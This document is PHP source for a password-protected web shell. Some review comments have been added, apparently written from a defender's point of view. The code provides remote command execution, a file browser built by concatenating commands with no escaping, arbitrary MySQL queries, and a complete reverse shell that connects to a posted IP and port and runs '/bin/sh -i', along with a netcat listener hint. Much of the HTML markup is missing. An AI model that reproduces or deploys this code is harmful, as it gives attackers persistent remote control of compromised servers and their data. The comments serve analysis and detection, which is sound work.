buildPageLogin(); else{ switch($_POST['cmd']){ case 'browser': $browserTools=new BrowserTools(); switch($_POST['method']){ case 'show': $this->buildPageStructure($browserTools->main($_POST['item'],false)); break; case 'execute': $this->buildPageStructure($browserTools->main($_POST['item'])); break; default: $this->buildPageStructure($browserTools->main('.')); break; } break; case 'logout': $this->logout(); break; case 'remove': $this->remove(); break; case 'php': $phpTools=new PhpTools(); switch($_POST['method']){ case 'execute': $util=New Util(); $run=$util->execute($_POST['item']); foreach($run as $row){ $resp[]=htmlentities(wordwrap($row,100,' ',TRUE),ENT_QUOTES); } $this->buildPageStructure($phpTools->main($resp)); break; default: $this->buildPageStructure($phpTools->main('')); break; } break; case 'mysql': $mySql=new MySQLTools(); switch($_POST['method']){ case 'connect': if(!empty($_POST['userdb'])&&!empty($_POST['serverdb'])&&!empty($_POST['portdb'])){ $_SESSION['userdb']=$_POST['userdb']; $_SESSION['passdb']=$_POST['passdb']; $_SESSION['serverdb']=$_POST['serverdb']; $_SESSION['portdb']=$_POST['portdb']; if($mySql->connect()){ $_SESSION['connected']=TRUE; $this->buildPageStructure($mySql->main()); } else{ $error="
Warning! ".$_SESSION['linkdb']->connect_error."
"; $this->buildPageStructure($mySql->main($error)); } } break; case 'selectdb': if(!empty($_POST['item'])){ $_SESSION['db']=$_POST['item']; if($mySql->selectDb($_POST['item'])){ $this->buildPageStructure($mySql->main()); }else{ $error="
Warning! Can't select the Database. Please try again.
"; $this->buildPageStructure($mySql->main($error)); } } break; case 'query': if(!empty($_POST['item'])){ if($result=$mySql->execute($_POST['item'])){ $_SESSION['query']=$result; $this->buildPageStructure($mySql->main()); } else{ $error="
Warning! ".$_SESSION['linkdb']->error."
"; $this->buildPageStructure($mySql->main($error)); } } break; case 'logout': $_SESSION['connected']=NULL; $_SESSION['userdb']=NULL; $_SESSION['passdb']=NULL; $_SESSION['serverdb']=NULL; $_SESSION['portdb']=NULL; $_SESSION['db']=NULL; $_SESSION['linkdb']=NULL; $this->buildPageStructure($mySql->main()); break; default: $this->buildPageStructure($mySql->main()); break; } break; case 'reverse': $reverseTools=new ReverseTools(); switch($_POST['method']){ case 'connect': if( isset($_POST['port']) && isset($_POST['ip']) && $_POST['port'] != "" && $_POST['ip'] != ""){ $result=""; $ip = $_POST['ip']; $port=$_POST['port']; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; /bin/sh -i'; $debug = 0; chdir("/"); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { echo "$errstr ($errno)"; exit(1); } $descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { echo "ERROR: Can't spawn shell"; exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); $result .= "Successfully opened reverse shell to $ip:$port"; while (1) { if (feof($sock)) { $result.="ERROR: Shell connection terminated"; break; } if (feof($pipes[1])) { $result.="ERROR: Shell process terminated"; break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], 
$chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); } $this->buildPageStructure($reverseTools->main()); break; default: $this->buildPageStructure($reverseTools->main('')); break; } break; case 'login': if(isset($_POST['pass'])&&!empty($_POST['pass'])){ $this->login($_POST['pass']); } break; default: $info=new Info(); $this->buildPageStructure($info->main()); break; } } }

    /**
     * Render the unauthenticated view: header, login form, footer.
     * Each builder echoes its fragment directly to the response.
     *
     * @param string|null $error optional fragment appended after the form
     */
    function buildPageLogin($error=NULL){
        $this->buildHeader();
        $this->buildLogin($error);
        $this->buildFooter();
    }

    /**
     * Render an authenticated page: header, menu, body, footer.
     *
     * NOTE(review): the body is echoed as supplied (see buildBody), so any
     * encoding has to happen in the tool class that produced it.
     *
     * @param string|null $body pre-built fragment from one of the tool classes
     */
    function buildPageStructure($body=NULL){
        $this->buildHeader();
        $this->buildMenu();
        $this->buildBody($body);
        $this->buildFooter();
    }

    /**
     * Echo the page header.
     *
     * NOTE(review): only the title text survives in this listing; the
     * surrounding markup appears to have been lost when the page was
     * extracted. The remaining literal is a weak content indicator at best.
     */
    function buildHeader(){
        $structure= " WebShell
";
        echo $structure;
    }

    /**
     * Echo the login form followed by the optional error fragment.
     * The form markup itself is not present in this listing.
     */
    function buildLogin($error){
        $structure= "
";
        $structure.=$error;
        echo $structure;
    }

    /** Echo the navigation menu (markup not present in this listing). */
    function buildMenu(){
        $structure= " ";
        echo $structure;
    }

    /** Echo the supplied body fragment unchanged; no encoding is applied here. */
    function buildBody($body){
        $structure=$body;
        echo $structure;
    }

    /** Echo the page footer (markup not present in this listing). */
    function buildFooter(){
        $structure="
";
        echo $structure;
    }

    /**
     * Password gate. On a match it sets the logged session flag and renders
     * the Info page; otherwise it re-renders the login form with a warning.
     *
     * NOTE(review): the comparison uses loose == against the pass property
     * (declared outside this view), so it is subject to PHP type juggling and
     * is not constant-time. No session id regeneration is visible on success.
     * In this listing, this single shared secret is the only control seen in
     * front of the command, file and database features of the dispatcher.
     *
     * @param mixed $pass value taken from the posted pass field
     */
    function login($pass){
        if($pass==$this->pass){
            $_SESSION['logged']=TRUE;
            $info=new Info();
            $this->buildPageStructure($info->main());
        }
        else{
            $error="
Warning! Password is not valid. Please try again.
";
            $this->buildPageLogin($error);
        }
    }

    /**
     * Destroy the session and redirect back to the script.
     *
     * NOTE(review): the redirect target is PHP_SELF, which is derived from
     * the request path; there is no exit after header(), so execution
     * continues in the caller.
     */
    function logout(){
        session_destroy();
        header('Location: '.$_SERVER['PHP_SELF']);
    }

    /**
     * Self-removal handler: destroys the session, then calls unlink on the
     * value of PHP_SELF.
     *
     * NOTE(review): PHP_SELF is the URL path of the request, not a filesystem
     * path, so this unlink presumably fails on most deployments and the file
     * stays on disk. Responders should not treat use of the remove command as
     * proof that the script is gone; a failed unlink would normally also
     * leave a PHP warning in the error log (confirm against host settings).
     * NOTE(review): the message is echoed in the branch where unlink reports
     * success, which looks inverted relative to its wording; the other branch
     * only redirects, again with no exit after header().
     */
    function remove(){
        session_destroy();
        if(unlink($_SERVER['PHP_SELF'])){
            echo "You can't remove this file.";
            exit;
        }
        header('Location: '.$_SERVER['PHP_SELF']);
    }
}

/**
 * View class for the Php Execute panel.
 *
 * main() starts an output fragment, appends each row of the run argument when
 * it is an array, and returns the fragment (the rest of the body follows on
 * the next lines of the file). The Util instance created here is not used in
 * the code that survives in this listing; it may have been referenced from
 * markup that was stripped - TODO confirm against an intact copy.
 */
class PhpTools{ function main($run){ $util=New Util(); $body='

Php Execute

Response

';
        // Append each response row, followed by a newline, to the panel body.
        // NOTE(review): rows are concatenated as supplied; the php/execute
        // branch of the dispatcher passes rows through htmlentities before
        // calling main(), and the default branch passes an empty string, which
        // skips this loop.
        if(is_array($run)){
            foreach($run as $row)
                $body.=$row."
"; } $body.='
'; return $body; } }

/**
 * View class for the reverse panel.
 *
 * main() only returns a static fragment: a heading and a netcat listener hint.
 * The socket and process handling is in the reverse/connect branch of the
 * dispatcher, not in this class. Any form markup appears to have been stripped
 * from this listing - TODO confirm against an intact copy.
 *
 * NOTE(review): main() declares no parameters, while the default branch of the
 * dispatcher passes an empty string; PHP ignores the extra argument.
 * NOTE(review): the hint text is a fixed literal inside the file, so it may be
 * usable as a content indicator when scanning a web root for this script;
 * treat it as a weak signal, since it is trivially editable.
 */
class ReverseTools{
    function main(){ $body='

Reverse shell

Listening with NetCat: nc -v -n -l 31337
'; return $body; } } class BrowserTools{ function getLinkDir($dir,$complete=true){ $path=""; if($complete){ $dirs = explode("/",$dir); for($i=0;$i'.$dirs[$i].'/'; } else{ if($i==0) $path.='/'; } } } else{ $path.=''.$dir.''; } return $path; } function getFixedFormat($result,$full_dir){ $util = new Util(); if(!empty($result)){ $structure=' '; for($i=1;$iimages('directory').'" /> '.htmlentities(wordwrap($result_array[8],50," ",TRUE),ENT_QUOTES).''; else $structure.=' '.htmlentities(wordwrap($result_array[8],50," ",TRUE),ENT_QUOTES).''; $structure.=''; $structure.=''; $structure.=''; $structure.=''; $structure.=''; $structure.=''; $structure.=''; } $structure.='
File name Permissions Owner Group Size Last modified
'.htmlentities(wordwrap($result_array[0],50," ",TRUE),ENT_QUOTES).''.htmlentities(wordwrap($result_array[2],50," ",TRUE),ENT_QUOTES).''.htmlentities(wordwrap($result_array[3],50," ",TRUE),ENT_QUOTES).''.htmlentities(wordwrap($result_array[4],50," ",TRUE),ENT_QUOTES).''.htmlentities(wordwrap($result_array[5],50," ",TRUE),ENT_QUOTES).' '.htmlentities(wordwrap($result_array[6],50," ",TRUE),ENT_QUOTES).' '.htmlentities(wordwrap($result_array[7],50," ",TRUE),ENT_QUOTES).'
'; return $structure; } }

    /**
     * Build the Browser Files panel.
     *
     * With is_dir true, the item is remembered in the session as the current
     * directory and listed. With is_dir false, the item is treated as a file:
     * it is read through Util::execute with a cat command, and the directory
     * remembered in the session is listed instead. An item of . resolves to
     * getcwd().
     *
     * NOTE(review): the dispatcher passes the posted item field straight in,
     * and both command strings below are built by plain concatenation with no
     * escaping visible here, so the field is effectively a command string and
     * not just a path. Util::execute is outside this view; presumably it runs
     * the string on the host. For detection, that would show up as cat and
     * ls -lhA child processes of the web server PHP worker - confirm against
     * process telemetry.
     * NOTE(review): file_content is assigned but not referenced in the code
     * that survives in this listing; the modal markup that presumably used it
     * was stripped.
     *
     * @param string $item   directory to list, or file to show
     * @param bool   $is_dir true to list a directory, false to show a file
     * @return string panel fragment
     */
    function main($item,$is_dir=true){
        $util = new Util();
        if($is_dir){
            $_SESSION['dir']=$item;
            $modal = "";
        }
        else{
            $file = $item;
            $item = $_SESSION['dir'];
            $file_content = $util->execute("cat ".$file);
            $modal = ' ';
        }
        if($item=='.'){ $full_dir=getcwd(); }
        else{ $full_dir=$item; }
        $body=$modal.'

Browser Files

Shell path: '.$this->getLinkDir(getcwd(),false).'
Path: '.$this->getLinkDir($full_dir).'
';
        // Directory listing: output of ls -lhA is handed to getFixedFormat.
        $body.=$this->getFixedFormat($util->execute("ls -lhA ".$full_dir),$full_dir);
        $body.='
'; return $body; } }

/**
 * Thin mysqli helper driven entirely by session state.
 *
 * Every operation reads host, user, password, database and port from the
 * session, and the connection handle is kept in the session linkdb entry.
 */
class MySqlLib{
    /**
     * Open a mysqli connection from the session-held settings and store the
     * handle in the session. Warnings from the constructor are suppressed.
     *
     * NOTE(review): the database password is read back from the session,
     * where the connect branch of the dispatcher stored the posted value. If
     * the host uses file-backed sessions, credentials typed into this panel
     * may be recoverable from session storage during response - confirm the
     * session handler.
     * NOTE(review): a live mysqli handle is placed in the session; whether it
     * survives the session write is not established by this listing.
     *
     * @return bool false when connect_errno is set, true otherwise
     */
    function connect(){
        $link=@new mysqli($_SESSION['serverdb'],$_SESSION['userdb'],$_SESSION['passdb'],$_SESSION['db'],$_SESSION['portdb']);
        $_SESSION['linkdb']=$link;
        if ($link->connect_errno) return false;
        return true;
    }

    /** Close the connection held in the session. */
    function disconnect(){
        $_SESSION['linkdb']->close();
    }

    /**
     * Reconnect and select the database named in the session.
     *
     * NOTE(review): the method declares no parameters; the dispatcher passes
     * the posted item, which is ignored here in favour of the session value.
     * The failure path returns before disconnect() is reached.
     *
     * @return bool true on success, false on failure or when not connected
     */
    function selectDb(){
        if($_SESSION['connected']==TRUE){
            $this->connect();
            if(!mysqli_select_db($_SESSION['linkdb'],$_SESSION['db'])){
                return false;
            }
            $this->disconnect();
            return true;
        }
        return false;
    }

    /**
     * Reconnect and run the supplied SQL text verbatim, with warnings
     * suppressed. The dispatcher passes the posted item field straight in.
     * The failure path returns before disconnect() is reached.
     *
     * @param string $query SQL text to run as given
     * @return mixed the mysqli_query result, or false on failure or when not connected
     */
    function execute($query){
        if($_SESSION['connected']==TRUE){
            $this->connect();
            if(!$result=@mysqli_query($_SESSION['linkdb'],$query)) return false;
            $this->disconnect();
            return $result;
        }
        return false;
    }

    /**
     * Run a query through execute() and collect every row as an object.
     *
     * NOTE(review): data is never initialised, so a query that yields no rows
     * reaches the return with an undefined variable.
     *
     * @param string $query SQL text to run as given
     * @return mixed list of row objects, or false on failure or when not connected
     */
    function getData($query){
        if($_SESSION['connected']==TRUE){
            if(!$result = $this->execute($query)) return false;
            while($row = mysqli_fetch_object($result)){
                $data[] = $row;
            }
            return $data;
        }
        return false;
    }
}

// View class for the MySQL panel; its body continues on the following lines.
class MySqlTools extends MySqlLib{ function __construct(){ } function getConnection(){ if($_SESSION['connected']==TRUE){ $structure=" User: ".$_SESSION['userdb']."
Server: ".$_SESSION['serverdb']."
Port: ".$_SESSION['portdb']."
Logout "; return $structure; } else{ $structure='
'; return $structure; } } function getTables(){ if($_SESSION['connected']==TRUE){ return $this->getData("select table_name from information_schema.tables where table_schema='".$_SESSION['db']."'"); } return false; } function getDatabases(){ $structure=NULL; $tables=NULL; if($_SESSION['connected']==TRUE){ $result=$this->getData("select schema_name from information_schema.schemata"); foreach($result as $row){ $structure.="
  • schema_name){ $structure.="class='active'"; $tables=$this->getTables(); } $structure.=">".$row->schema_name."
  • "; if(!empty($tables)){ $structure.="
  • "; $tables=NULL; } } } return $structure; } function getQueryResult(){ if(!empty($_SESSION['query'])){ $structure=' '; while($row= $_SESSION['query']->fetch_field()) $structure.=''; $structure.=' '; while($result = mysqli_fetch_object($_SESSION['query'])){ $structure.=' '; foreach($result as $row){ $structure.=''; } $structure.=' '; } $structure.='
    '.htmlentities($row->name,ENT_QUOTES).'
    '.htmlentities($row,ENT_QUOTES).'
    '; $_SESSION['query']=NULL; return $structure; } } function main($error=NULL){ $body='
    '.$error.'

    Execute Query